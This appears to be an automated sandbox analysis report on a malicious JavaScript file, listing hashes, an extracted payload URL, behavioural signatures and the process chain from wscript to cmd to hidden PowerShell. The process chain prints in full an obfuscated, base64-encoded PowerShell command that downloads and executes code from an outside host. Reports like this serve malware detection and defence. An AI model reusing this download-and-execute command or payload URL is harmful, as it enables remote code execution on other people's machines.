Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11-03-2024 20:51
Static task
static1
Behavioral task
behavioral1
Sample
c191f740a3c501e74bb39a54dbbeca04.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c191f740a3c501e74bb39a54dbbeca04.js
Resource
win10v2004-20240226-en
General
-
Target
c191f740a3c501e74bb39a54dbbeca04.js
-
Size
105KB
-
MD5
c191f740a3c501e74bb39a54dbbeca04
-
SHA1
613dc5959093879c2c100d7b29c09085f27507f2
-
SHA256
f52133d8cead0197079ff8020998d4225b338a4f726b7f4f1b64c69fdd6f542b
-
SHA512
48e71ab0718c2185a0cdbafa30148343c723218f622477af24ffbc8899d645afa9d7b6019975927ac152c2f110c508d2d152080841331d17c239580cdb6c92b7
-
SSDEEP
3072:YW5MWjrTR9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvj:YW5hR9Ry9RuXqW4SzUHmLKeMMU7GwWB4
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2028 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2028 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2220 wrote to memory of 940 2220 wscript.exe 28 PID 2220 wrote to memory of 940 2220 wscript.exe 28 PID 2220 wrote to memory of 940 2220 wscript.exe 28 PID 940 wrote to memory of 2028 940 cmd.exe 30 PID 940 wrote to memory of 2028 940 cmd.exe 30 PID 940 wrote to memory of 2028 940 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c191f740a3c501e74bb39a54dbbeca04.js1⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-